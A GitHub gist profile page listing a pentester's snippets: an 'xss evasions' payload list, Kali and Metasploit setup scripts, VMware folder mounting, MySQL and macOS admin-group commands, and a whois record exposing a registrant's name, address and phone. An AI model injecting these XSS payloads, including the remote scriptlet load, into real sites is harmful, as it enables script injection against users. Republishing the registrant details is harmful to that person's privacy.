Skip to content

Instantly share code, notes, and snippets.

View synackme's full-sized avatar

Landon Mayo synackme

  • Houston, Tx
View GitHub Profile
@synackme
synackme / xss.js
Last active September 11, 2018 04:46
xss evasions
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" allowscriptaccess="always"></embed>
<object data="https://xss.rocks/scriptlet.html" type="text/x-scriptlet"></object>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<form><a href="javascript:\u0061lert(1)">X
@synackme
synackme / kali-metasploit-setup.sh
Created March 24, 2018 19:18
Kali metasploit setup
service postgresql start
msfdb init
echo "Launching msfconsole..."
echo "Run the following command inside msfconsole: db_status"
echo " "
echo "If all goes well, you should see the following message:"
echo "[*] postgresql connected to msf3"
sleep 5
msfconsole
@synackme
synackme / mount-shared-folders.sh
Created March 24, 2018 19:07
Kali - Adding Support for Shared Folders When Using open-vm-tools
# As of Sept 2015, VMware recommends using the distribution-specific open-vm-tools (OVT)
# instead of the VMware Tools package for guest machines. To install open-vm-tools in Kali,
# first make sure you are fully updated, and then enter the following:
cat <<EOF > /usr/local/sbin/mount-shared-folders
#!/bin/bash
vmware-hgfsclient | while read folder; do
vmwpath="/mnt/hgfs/\${folder}"
echo "[i] Mounting \${folder} (\${vmwpath})"
mkdir -p "\${vmwpath}"
@synackme
synackme / whois-btempurl.com.txt
Last active May 25, 2016 15:29
whois on btempurl.com
sectest01:pentest lmayo$ whois btempurl.com
Registrant Name: Erwin Yu
Registrant Organization: UMA
Registrant Street: 17800 castleton st 17800 castleton st
Registrant City: City of industry
Registrant State/Province: CA
Registrant Postal Code: 91748
Registrant Country: US
Registrant Phone: +1.3109897879
@synackme
synackme / mysql_db_and_user.txt
Created May 3, 2016 04:43
Create new user in MySQL and give it full access to one database
GRANT ALL PRIVILEGES ON dbTest.* To 'user'@'hostname' IDENTIFIED BY 'password';
@synackme
synackme / boxstarter-gist.txt
Last active April 22, 2016 16:42
My boxstarter gist
Set-WindowsExplorerOptions -EnableShowHiddenFilesFoldersDrives -EnableShowProtectedOSFiles -EnableShowFileExtensions
Enable-RemoteDesktop
Set-StartScreenOptions -EnableBootToDesktop
cinst fiddler4
cinst git-credential-winstore
cinst console-devel
cinst sublimetext2
cinst poshgit
cinst dotpeek
Install-WindowsUpdate -AcceptEula
@synackme
synackme / bash_prompt_user.sh
Created February 17, 2016 15:23
How to prompt for input in a Linux shell script
while true; do
read -p "Do you wish to install this program?" yn
case $yn in
[Yy]* ) make install; break;;
[Nn]* ) exit;;
* ) echo "Please answer yes or no.";;
esac
done
#!/usr/bin/python
import sys, subprocess, getopt
if len(sys.argv) != 2:
print "Usage: osx_add_user_to_group.py <user>"
sys.exit(1)
for arg in sys.argv[1:]:
bashCommand1 = "sudo dseditgroup -o edit -a %s -t user admin" % sys.argv[1]
bashCommand2 = "sudo dseditgroup -o edit -a %s -t user wheel" % sys.argv[1]
@synackme
synackme / osx_add_user_to_group.sh
Last active February 16, 2016 00:23
add user to group on osx
#!/bin/bash
sudo dseditgroup -o edit -a $username_to_add -t user admin
sudo dseditgroup -o edit -a $username_to_add -t user wheel
@synackme
synackme / how-to-add-user-to-a-group-from-mac-os-x-command-line.sh
Created February 16, 2016 00:04
Add a user to a group from the command line. Add user to 'admin' and 'wheel' groups.
{OS X version of usermod}
{osx_add_user_to_group.sh}
{filecount}
{mac_add_user2group.sh}
sudo dseditgroup -o edit -a $username_to_add -t user admin
sudo dseditgroup -o edit -a $username_to_add -t user wheel